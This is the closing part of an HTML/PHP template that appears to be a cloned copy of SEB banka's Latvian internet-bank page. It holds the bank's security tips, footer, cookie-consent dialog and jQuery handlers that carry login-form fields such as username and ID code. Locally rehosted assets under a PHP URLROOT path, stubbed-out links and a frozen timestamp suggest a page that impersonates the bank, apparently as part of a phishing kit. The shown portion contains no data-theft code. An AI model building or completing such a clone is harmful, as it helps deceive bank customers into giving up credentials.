                                                   <p><img src="<?= URLROOT ?>/front_end/front_end_files/seb/icon_hyyumark.png" class="f-right ml10 mb5">• Vienmēr esiet uzmanīgi, atverot saites, ko saņemat e-pastā vai SMS. Izmantojot internetbanku, pārliecinieties par lapas autentiskumu (adrese sākas ar “https://" vai adreses lodziņā redzams slēdzenes simbols) vai pieslēdzieties tai no bankas mājaslapas.<br>
                                                      • Darbā ar Smart-ID atcerieties, ka PIN1 kodu izmanto autentifikācijai, bet PIN2 kodu – maksājumu un līgumu apstiprināšanai. Neievadiet PIN2 kodu, ja pats neesat iniciējis maksājumu vai darbību.<br>
                                                      • Vienmēr pārliecinieties, ka drošības kods bankas maksājumā sakrīt ar to, kas redzams Jūsu Smart-ID lietotnē.<br>
                                                      <br>Pamanot aizdomīgus SEB bankas vārdā izplatītus ziņojumus, lūdzu, sazinieties ar Klientu centru pa tālruni 26668777.<br>
                                                   </p>
                                                </li>
                                             </ul>
                                          </div>
                                       </div>
                                    </div>
                                 </div>
                                 <!-- col02a -->
                              </div>
                              <!-- col col02 col02b -->
                           </div>
                           <!-- clear colwrapper -->
                        </div>
                        <!-- clear groups01  id=mainwincell -->
                     </div>
                     <!-- content01 -->
                  </div>
                  <!-- box04 -->
               </div>
               <!-- box03 -->
            </div>
            <!-- box02 -->
            <div class="footer01 clear">
               <div class="wrapper01 clear">
                  <div class="mobile-hide">
                     <!-- desktop footer -->
                     <p class="f-left">
                        © SEB banka <span>|</span>
                        <a href="#" onclick="if (document.sessionData.sesskey!=null &amp;&amp; document.sessionData.sesskey.value!=&#39;&#39;) { $(&#39;ul.usertools&gt;li:eq(1)&gt;a&#39;).trigger(&#39;click&#39;); } else { window.open(&#39;http://www.seb.lv/node/2115&#39;, &#39;_new&#39;, &#39;&#39;); }">Kontaktinformācija</a>
                        <span>|</span> <a target="_new" href="#">Drošība</a> <span>|</span> <a class="seb-consent-change" href="#">Sīkdatnes</a>
                        <span>|</span> Tālr. +371 26668777; e-pasts: <a href="#">info@seb.lv</a>
                        <br><br>
                        Pirms līguma noslēgšanas, rūpīgi iepazīstieties ar Vispārējiem darījumu noteikumiem <a target="_new" href="#"> AS SEB banka mājas lapā</a>. <br>Neskaidrību gadījumā aicinām sazināties ar bankas pārstāvi.
                     </p>
                  </div>
                  <div class="desktop-hide">
                     <!-- mobile footer -->
                     <p class="f-left">
                        © SEB banka <span>|</span>
                        <a href="#" onclick="if (document.sessionData.sesskey!=null &amp;&amp; document.sessionData.sesskey.value!=&#39;&#39;) { $(&#39;ul.usertools&gt;li:eq(1)&gt;a&#39;).trigger(&#39;click&#39;); } else { window.open(&#39;http://www.seb.lv/node/2115&#39;, &#39;_new&#39;, &#39;&#39;); }">Kontaktinformācija</a>
                        <span>|</span> <a target="_new" href="#">Drošība</a> <span>|</span> <a class="seb-consent-change" href="#">Sīkdatnes</a>
                        <span>|</span> tālr. +371 26668777; e-pasts: <a href="#">info@seb.lv</a>
                        <br><br>
                        Pirms līguma noslēgšanas, rūpīgi iepazīstieties ar Vispārējiem darījumu noteikumiem <a target="_new" href="#"> AS SEB banka mājas lapā</a>. <br>Neskaidrību gadījumā aicinām sazināties ar bankas pārstāvi.
                     </p>
                  </div>
                  <p class="f-right">
                     14.04.2023, 11.46
                  </p>
               </div>
            </div>
            <div id="seb-consent" class="seb-cookie-consent seb-cookiemessage hidden">
               <div class="inner">
                  <div class="header-cookie-message">
                     <div class="logo-cookie-message">
                        <a href="#" class="active"><img src="<?= URLROOT ?>/front_end/front_end_files/seb/seb_logotype_rgb.svg" alt="S|E|B"></a>
                     </div>
                     <div id="seb-consent-languages" class="languages-cookie-message">
                        <div class="language-switcher-cookie-message">
                           <ul class="language-switcher-cookie-message">
                              <li><a href="#" class="language-link en consent-language-switch" data-language="ENG"><span>English</span></a></li>
                              <li><a href="#" class="language-link ru consent-language-switch" data-language="RUS"><span>Русский</span></a></li>
                           </ul>
                        </div>
                     </div>
                  </div>
                  <div id="cookies-allowed-message" class="content-cookie-message">
                     <h2 class="no-print" style="font-size: 36px; font-weight: bold; padding-bottom: 10px;">Kādēļ mēs izmantojam sīkdatnes?</h2>
                     <p class="no-print">Mēs savā mājaslapā sīkdatnes (cookies) izmantojam vairākiem nolūkiem. Vietnes darbībai nepieciešamās sīkdatnes ir obligātas un vajadzīgas mājaslapas korektai funkcionēšanai, un tās tiek automātiski saglabātas Jūsu ierīcē, kad Jūs piekļūstat mūsu mājaslapai. Mēs izmantojam arī neobligātas sīkdatnes, lai sniegtu Jums personalizētu informāciju par mūsu produktiem un pakalpojumiem, kā arī nodrošinātu Jums vislabāko iespējamo pārlūkošanas pieredzi. Jūs varat noraidīt visas neobligātās sīkdatnes, izvēloties atļaut „Tikai obligātās sīkdatnes“. <br>Lai uzzinātu vairāk, iepazīstieties ar mūsu <a href="#" >"Sīkdatņu lietošanas politiku"</a>. <br> Lai pārskatītu un/vai mainītu sīkdatņu izmantošanu, lūdzu, dodieties uz <a id="seb-consent-manage" class="discrete cookie-settings hidden" href="#"><span>sīkdatņu iestatījumiem</span></a>. </p>
                  </div>
                  <div id="cookies-disabled-message" class="hidden">
                     <h2 class="no-print" style="font-size: 36px; font-weight: bold; padding-bottom: 10px;">Kādēļ mēs izmantojam sīkdatnes?</h2>
                     <p class="no-print">Mēs savā mājaslapā sīkdatnes (cookies) izmantojam vairākiem nolūkiem. Vietnes darbībai nepieciešamās sīkdatnes ir obligātas un vajadzīgas mājaslapas korektai funkcionēšanai, un tās tiek automātiski saglabātas Jūsu ierīcē, kad Jūs piekļūstat mūsu mājaslapai. Mēs izmantojam arī neobligātas sīkdatnes, lai sniegtu Jums personalizētu informāciju par mūsu produktiem un pakalpojumiem, kā arī nodrošinātu Jums vislabāko iespējamo pārlūkošanas pieredzi. Jūs varat noraidīt visas neobligātās sīkdatnes, izvēloties atļaut „Tikai obligātās sīkdatnes“. <br>Lai uzzinātu vairāk, iepazīstieties ar mūsu <a href="#" >"Sīkdatņu lietošanas politiku"</a>. <br></p>
                     <p class="no-print content-cookie-warning"><b>Lūdzu, ieslēdziet sīkdatnes Jūsu pārlūkprogrammā.  </b><br><br>
                        Lai garantētu vietnes drošību, SEB internetbanku var izmantot tikai ar ieslēgtām obligātajām sīkdatnēm (cookies). Ja vēlaties pieslēgties internetbankai, Jums nepieciešams ieslēgt sīkdatnes Jūsu tīmekļa pārlūkprogrammā, un pēc tam pieņemt obligātās sīkdatnes internetbankā. Lūdzu, pievērsiet uzmanību, ka šādā veidā mēs glabājam tikai obligātās sīkdatnes. No citām sīkdatnēm Jūs varat atteikties.
                        <br><br>
                        Lai ieslēgtu sīkdatnes, lūdzu, skatiet šo <a href="#" >pamācību</a>. Pēc sīkdatņu ieslēgšanas nepieciešams pārlādēt šo lapu vai vēlreiz atvērt <a href="#" >internetbanku</a>.
                     </p>
                  </div>
                  <div id="cookies-manage-message" class="hidden">
                     <h2 class="no-print" style="font-size: 36px; font-weight: bold; padding-bottom: 10px;">Kādēļ mēs izmantojam sīkdatnes?</h2>
                     <p class="no-print">Papildus obligātajam sīkdatnēm, kas ir nepieciešamas tīmekļa vietnes korektai darbībai, mēs arīdzan izmantojam sīkdatnes, kas dažādos veidos atvieglo mūsu mājaslapas pārlūkošanu un palīdz mums saprast, kā tiek izmantota mūsu tīmekļa vietne.
                        <br><br>
                        Sīkdatne ir neliela teksta datne, kas sastāv no burtiem un cipariem. Apmeklējot tīmekļa vietnes, sīkdatnes tiek saglabātas Jūsu ierīcē. Sīkdatnes darbojas kā tehnisks atbalsts, kas dažādos veidos atvieglo Jūsu apmeklētās tīmekļa vietnes lietošanu. Sīkdatnes mūsu mājaslapā tiek nosūtītas no SEB bankas vai trešajām pusēm un tiek saglabātas dažādos veidos atkarībā no sīkdatnes funkcionalitātes. Zemāk varat norādīt sīkdatņu iestatījumus vai uzzināt, kā tos mainīt, izmantojot <a href="#" >Sīkdatņu politiku</a>.
                     </p>
                  </div>
                  <div id="content-cookie-options" class="content-cookie-settings form01 initdone hidden">
                     <div class="cookie-list row">
                        <ul id="contsents-list" class="checkboxes clear"></ul>
                     </div>
                  </div>
                  <div id="cookies-allowed-buttons">
                     <ul class="actions01 clear">
                        <li class="f-left">
                           <a id="seb-consent-accept" class="accept-selected" href="#"><span>Pieņemt visas sīkdatnes</span></a>
                        </li>
                        <li class="f-left">
                           <a id="seb-consent-essential" class="accept-selected" href="#"><span>Tikai obligātās sīkdatnes</span></a>
                        </li>
                        <li class="f-left">
                           <a id="seb-consent-close" class="main hidden" href="#"><span>Aizvērt</span></a>
                        </li>
                     </ul>
                  </div>
               </div>
            </div>
            <script type="text/javascript">
               $('.consent-language-switch').click(function(e) {
               e.preventDefault();
               if (ConsentDisclaimer.isUpdateState()) {
               ConsentDisclaimer.setConsentDisclaimerData();
               }
               SetLang($(this).data('language'));
               addFieldsToRequest();
               Unet_FormSubmitOnClick('mylangform','','','','1');
               });
               function addFieldsToRequest() {
               var fields = [];
               addValueToArray('Smartbtn', fields);
               addValueToArray('MOBbtn', fields);
               addValueToArray('IDbtn', fields);
               addValueToArray('Codebtn', fields);
               addValueToArray('username1', fields);
               addValueToArray('idcode1', fields);
               if (fields.length > 0) {
               $('<input>').attr({
               type: 'hidden',
               name: 'fields',
               value: JSON.stringify(fields)
               }).appendTo('#mylangform');
               }
               }
               function addValueToArray(id, arr) {
               if ($("#" + id).prop("type") == 'radio') {
               var value = $("#" + id).prop('checked')
               if (value) {
               arr.push({id: id, value: value});
               }
               } else {
               var value = $("#" + id).val();
               if (value) {
               arr.push({id: id, value: value});
               }
               }
               }
               var ConsentDisclaimer = {
               state: '',
               consentDisclaimerId: 'seb-consent',
               acceptButtonId: 'seb-consent-accept',
               continueButtonId: 'seb-consent-continue',
               changeButtonClass: 'seb-consent-change',
               consentsListId: 'contsents-list',
               consentsDiscDataId: 'consent_disc',
               consentManageId: 'seb-consent-manage',
               consentEssentialId: 'seb-consent-essential',
               consentManageOptionsId: 'content-cookie-options',
               cookiesAllowedMessageId: 'cookies-allowed-message',
               cookiesAllowedButtonsId: 'cookies-allowed-buttons',
               cookiesDisabledWarningId: 'cookies-disabled-message',
               cookiesManageIdMessage: 'cookies-manage-message',
               cookiesAreAllowed: null,
               cookiesManageEnabled: false,
               settings: {
               cookieName: '',
               version: 1,
               expire: 365,
               consents: [],
               },
               parameters: {
               page: 1,
               consents: [],
               },
               cookieObj: null,
               initialize: function() {
               this.removeConsentDisclaimerData();
               this.getSettings();
               $("#" + this.acceptButtonId).click(function(e) {
               e.preventDefault();
               ConsentDisclaimer.saveCookie();
               ConsentDisclaimer.hideDisclaimer();

               addFieldsToRequest();
               Unet_FormSubmitOnClick('mylangform','','','','1');

               });
               $("." + this.changeButtonClass).click(function(e) {
               e.preventDefault();
               ConsentDisclaimer.setUpdateState();
               ConsentDisclaimer.setConsentDisclaimerManagePage();
               ConsentDisclaimer.showManageOptions();
               ConsentDisclaimer.changeAcceptButtonTitle();
               ConsentDisclaimer.showDisclaimer();
               });
               $("#" + this.consentManageId).click(function(e) {
               e.preventDefault();
               ConsentDisclaimer.uncheckAllVisibleOption();
               ConsentDisclaimer.changeAcceptButtonTitle();
               ConsentDisclaimer.showManageOptions();
               ConsentDisclaimer.hideManageButton();
               ConsentDisclaimer.setUpdateState();
               ConsentDisclaimer.setConsentDisclaimerManagePage();
               });
               $("#" + this.consentEssentialId).click(function(e) {
               e.preventDefault();
               ConsentDisclaimer.uncheckAllVisibleOption();
               ConsentDisclaimer.saveCookie();
               ConsentDisclaimer.hideDisclaimer();

               addFieldsToRequest();
               Unet_FormSubmitOnClick('mylangform','','','','1');

               });
               $("#" + this.continueButtonId).click(function(e) {
               e.preventDefault();
               ConsentDisclaimer.hideDisclaimer();
               });
               },
               attachExternalLinkToManageClick: function() {
               $("." + this.changeButtonClass).click(function(e) {
               e.preventDefault();
               var win = window.open('https://www.seb.lv/sikfaili', '_blank');
               win.focus();
               });
               },
               setUpdateState: function() {
               this.state = 'update';
               },
               isUpdateState: function() {
               return this.state == 'update';
               },
               showDisclaimer: function() {
               this.cleanConsentList();
               $.each(ConsentDisclaimer.settings.consents, function(key, value) {
               ConsentDisclaimer.addConsentToList(value);
               });
               $("#" + this.consentDisclaimerId).removeClass('hidden');
               $('#header01 div:first-child').addClass('hidden');
               if (ConsentDisclaimer.areCookiesEnabled()) {
               if (ConsentDisclaimer.cookiesManageEnabled === false)
               $("#" + this.cookiesAllowedMessageId).removeClass('hidden');
               $("#" + this.cookiesDisabledWarningId).addClass('hidden');
               $("#" + this.cookiesAllowedButtonsId).removeClass('hidden');
               } else {
               $("#" + this.cookiesAllowedMessageId).addClass('hidden');
               $("#" + this.cookiesDisabledWarningId).removeClass('hidden');
               $("#" + this.cookiesAllowedButtonsId).addClass('hidden');
               }
               },
               changeAcceptButtonTitle: function() {
               $("#" + this.acceptButtonId).html('<span>Saglabāt uzstādījumus</span>');
               },
               hideDisclaimer: function() {
               $("#" + this.consentDisclaimerId).addClass('hidden');
               $('#header01 div:first-child').removeClass('hidden');
               },
               hideContinueButton: function() {
               $("#" + this.continueButtonId).addClass('hidden');
               },
               showContinueButton: function() {
               $("#" + this.continueButtonId).removeClass('hidden');
               },
               hideAcceptButton: function() {
               $("#" + this.acceptButtonId).addClass('hidden');
               },
               showAcceptButton: function() {
               $("#" + this.acceptButtonId).removeClass('hidden');
               },
               hideManageButton: function() {
               $("#" + this.consentManageId).addClass('hidden');
               },
               showManageButton: function() {
               $("#" + this.consentManageId).removeClass('hidden');
               },
               showManageOptions: function() {
               $("#" + this.consentManageOptionsId).removeClass('hidden');
               $("#" + this.cookiesAllowedMessageId).addClass('hidden');
               $("#" + this.cookiesManageIdMessage).removeClass('hidden');
               ConsentDisclaimer.cookiesManageEnabled = true;
               },
               cleanConsentList: function() {
               $("#" + this.consentsListId).html('');
               },
               removeConsentDisclaimerData: function() {
               $('input[name=' + ConsentDisclaimer.consentsDiscDataId + ']').prop('value', '');
               },
               setConsentDisclaimerManagePage: function() {
               this.parameters.page = 2;
               },
               setConsentDisclaimerData: function() {
               if (this.parameters.page == 2) {
               this.setConsentOptionsToParameters();
               }
               var data = this.serrializeData();
               $('input[name=' + ConsentDisclaimer.consentsDiscDataId + ']').prop('value', data);
               },
               uncheckAllVisibleOption: function() {
               $('.consent-option').each(function() {
               if (!$(this).is('[disabled]')) {
               $(this).prop('checked', false);
               }
               });
               },
               restoreVisibleOptions: function() {
               if (this.parameters.page == 2 && this.parameters.consents.length > 0) {
               $.each(ConsentDisclaimer.parameters.consents, function(key, entry) {
               $('#consent-entry-' + entry.name).prop('checked', entry.checked);
               });
               }
               },
               addConsentToList: function(consentObj) {
               var disabled="";
               var checked = "checked";
               if (consentObj.required) {
               disabled = "disabled=\"\"";
               }
               if (ConsentDisclaimer.cookieObj != undefined &&
               ConsentDisclaimer.cookieObj.consents[consentObj.consent] != undefined &&
               ConsentDisclaimer.cookieObj.consents[consentObj.consent] != true) {
               checked = "";
               }
               var htmlToAdd = "<li><div class=\"item\"><label><input type=\"checkbox\" name=\"cookies\" id=\"consent-entry-" +
               consentObj.consent + "\" value=\"" + consentObj.consent +  "\" " + disabled + " " +
               checked + " class=\"consent-option\">" + consentObj.text + "<a href=\"#\" class=\"helpico02 showtooltip init12\" title=\"" + consentObj.tooltip + "\"><span>?</span></a></label></div></li>";
               $("#" + this.consentsListId).append(htmlToAdd);
               },
               getSettings: function() {
               $.get( "ipank.p?act=CONSENTDATA&lang=LAT", function( data ) {
               ConsentDisclaimer.settings.version = data.version;
               ConsentDisclaimer.settings.cookieName = data.cookie;
               ConsentDisclaimer.settings.expire = data.expire;
               $.each(data.consents, function(key, value) {
               ConsentDisclaimer.settings.consents.push(value);
               });
               var json = ConsentDisclaimer.getCookie();
               var showDisclaimer = false;







               if (json != undefined) {
               ConsentDisclaimer.cookieObj = JSON.parse(json);
               }
               if (!ConsentDisclaimer.isAccepted() || showDisclaimer) {
               if (showDisclaimer) {
               ConsentDisclaimer.setUpdateState();
               ConsentDisclaimer.setConsentDisclaimerManagePage();
               ConsentDisclaimer.hideManageButton();
               ConsentDisclaimer.showManageOptions();
               ConsentDisclaimer.changeAcceptButtonTitle();
               } else {
               ConsentDisclaimer.showManageButton();
               }
               ConsentDisclaimer.showDisclaimer();
               ConsentDisclaimer.restoreVisibleOptions();
               }
               });
               },
               isAccepted: function() {
               return (ConsentDisclaimer.cookieObj != undefined && ConsentDisclaimer.cookieObj.version >= ConsentDisclaimer.settings.version);
               },
               setConsentOptionsToParameters: function() {
               ConsentDisclaimer.parameters.consents = [];
               $.each(ConsentDisclaimer.settings.consents, function(key, entry) {
               if (!entry.required) {
               var obj = {
               name: entry.consent,
               checked: $('#consent-entry-' + entry.consent).is(':checked')
               };
               ConsentDisclaimer.parameters.consents.push(obj);
               }
               });
               },
               serrializeData: function() {
               return JSON.stringify(this.parameters);
               },
               deserrializeData: function(requestData) {
               try {
               this.parameters = JSON.parse(requestData);
               } catch (error) {
               }
               },
               getCookie: function() {
               return $.IbCookie(this.settings.cookieName);
               },
               saveCookie: function() {
               this.cookieObj = {
               version: this.settings.version,
               consents: {}
               }
               $.each(ConsentDisclaimer.settings.consents, function(key, entry) {
               if (entry.required) {
               ConsentDisclaimer.cookieObj.consents[entry.consent] = true;
               } else {
               ConsentDisclaimer.cookieObj.consents[entry.consent] = $('#consent-entry-' + entry.consent).is(':checked');
               }
               });
               $.IbCookie(this.settings.cookieName, JSON.stringify(this.cookieObj), {expires: this.settings.expire});
               },
               areCookiesEnabled: function() {
               if (ConsentDisclaimer.cookiesAreAllowed != null) {
               } else {
               $.IbCookie('testCookie', 'check');
               var testcookie = $.IbCookie('testCookie');
               $.removeIbCookie('testcookie');
               ConsentDisclaimer.cookiesAreAllowed = testcookie;
               }
               return ConsentDisclaimer.cookiesAreAllowed;
               }
               }
               $(document).ready(function(){
               if (ConsentDisclaimer.areCookiesEnabled()) {
               ConsentDisclaimer.initialize();
               } else {

               ConsentDisclaimer.initialize();

               }
               var fieldsObj = '';







               if (fieldsObj) {
               $.each(fieldsObj, function(key, entry) {
               if($("#" + entry.id).attr('type') == 'radio') {
               $("#" + entry.id).prop("checked", true);
               $("#" + entry.id).click();
               } else {
               $("#" + entry.id).val(entry.value);
               }
               });
               }
               });
            </script>
         </div>
         <!-- box01 -->
      </div>
      <!-- box00 -->
      <div id="notsupported">
         <div id="logo-min"><a href="#"><img src="<?= URLROOT ?>/front_end/front_end_files/seb/seb_logotype_rgb.svg" alt="S|E|B"></a></div>
         Ekrāna platums un izšķirtspēja ir pārāk mazi.
      </div>
      <div id="tooltip">
         <div id="tooltip-inner">Laen...</div>
         <div id="tooltip-arrow"></div>
      </div>
   </body>
</html>
